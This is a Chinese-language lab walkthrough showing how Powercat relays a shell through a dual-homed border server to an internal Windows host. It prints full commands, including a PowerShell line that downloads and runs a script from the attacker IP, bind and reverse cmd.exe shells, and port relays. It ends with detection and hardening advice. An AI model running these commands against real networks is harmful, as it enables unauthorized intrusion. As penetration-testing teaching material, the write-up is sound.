Powercat内网端口转发实战：穿透边界服务器获取Shell

Powercat内网端口转发实战：穿透边界服务器获取Shell

实验概述

本实验演示如何使用Powercat在内网环境中通过边界服务器进行端口转发，最终从外部攻击机获取内网主机的Shell权限。

实验拓扑

+----------------+      +---------------------+      +-------------------+
|     Kali       |      |   边界服务器        |      |  内网主机         |
|   攻击机       |------|   Windows 7        |------|  Windows Server   |
| 192.168.1.26   |      | 外网:192.168.1.83  |      |  2012             |
|                |      | 内网:1.1.1.8       |      |  1.1.1.2          |
+----------------+      +---------------------+      +-------------------+
     ↓                         ↓                           ↓
  执行NC连接              双网卡中转                承载业务服务
  nc 192.168.1.83:8000   Powercat转发            Powercat监听9999端口

环境配置

网络环境说明

• 内网主机：Windows Server 2012 (IP: 1.1.1.2)
• 边界服务器：Windows 7 双网卡
  • 内网卡 IP: 1.1.1.8
  • 外网卡 IP: 192.168.1.83
• 攻击机：Kali Linux (IP: 192.168.1.26)

Powercat简介

Powercat是Netcat的PowerShell版本，提供了网络连接、端口转发、文件传输等功能，在渗透测试中常用于内网横向移动。

攻击步骤详解

步骤1：在内网主机上设置监听

在Windows Server 2012上执行以下命令：

# 下载并导入Powercat
IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.1.26/powercat.ps1')

# 监听9999端口并绑定cmd.exe
powercat -l -v -p 9999 -e cmd.exe

参数说明：

• -l：监听模式
• -v：详细输出
• -p 9999：监听端口
• -e cmd.exe：执行cmd.exe

步骤2：在边界服务器上设置转发

在Windows 7边界服务器上执行：

# 下载并导入Powercat
IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.1.26/powercat.ps1')

# 设置端口转发
powercat -l -v -p 8000 -r tcp:1.1.1.2:9999

参数说明：

• -l -v -p 8000：在8000端口监听
• -r tcp:1.1.1.2:9999：将流量转发到内网主机的9999端口

步骤3：从攻击机连接

在Kali攻击机上执行：

nc 192.168.1.83 8000 -vv

参数说明：

• 192.168.1.83：边界服务器外网IP
• 8000：边界服务器监听端口
• -vv：双重详细输出

技术原理分析

流量路径

Kali(192.168.1.26) → Win7外网(192.168.1.83:8000) → Win7内网(1.1.1.8) → Win2012(1.1.1.2:9999)

Powercat转发机制

1. 监听端：在目标主机创建监听套接字
2. 中继端：建立双向数据通道
3. 连接端：发起最终连接请求

扩展应用场景

场景1：多层网络穿透

# 在第二层边界服务器上
powercat -l -p 7000 -r tcp:1.1.1.8:8000

# 在攻击机上
nc 192.168.1.83 7000

场景2：反向Shell连接

# 在内网主机上（反向连接）
powercat -c 192.168.1.83 -p 8000 -e cmd.exe

# 在边界服务器上（中继到攻击机）
powercat -l -p 8000 -r tcp:192.168.1.26:9000

# 在攻击机上
nc -lvp 9000

场景3：文件传输

# 接收文件
powercat -l -p 9999 -of received_file.txt

# 发送文件
powercat -c 1.1.1.2 -p 9999 -i file_to_send.txt

防御措施

检测Powercat活动

# 监控PowerShell进程网络活动
Get-NetTCPConnection | Where-Object {$_.OwningProcess -eq (Get-Process powershell).Id}

# 检查可疑的PowerShell命令
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; ID=4104} | 
Where-Object {$_.Message -like "*powercat*"}

防护建议

1. 应用白名单：限制PowerShell执行权限
2. 网络监控：检测异常的端口转发活动
3. 权限控制：遵循最小权限原则
4. 日志审计：启用详细的PowerShell日志记录

故障排除

常见问题及解决方案

1. 连接失败

   • 检查防火墙设置
   • 验证网络路由
   • 确认Powercat正确加载

2. 命令无响应

   • 检查cmd.exe路径
   • 验证权限级别
   • 查看杀软拦截日志

3. 转发中断

   • 检查网络稳定性
   • 验证端口占用情况
   • 查看系统资源使用

总结

通过本实验，我们成功演示了使用Powercat进行内网端口转发的完整流程。这种技术在内网渗透测试中具有重要价值，但同时也强调了企业需要加强内网安全防护，特别是对PowerShell使用的监控和管理。

注意：本文技术仅用于授权的安全测试和教育目的，未经授权的使用可能违反法律法规。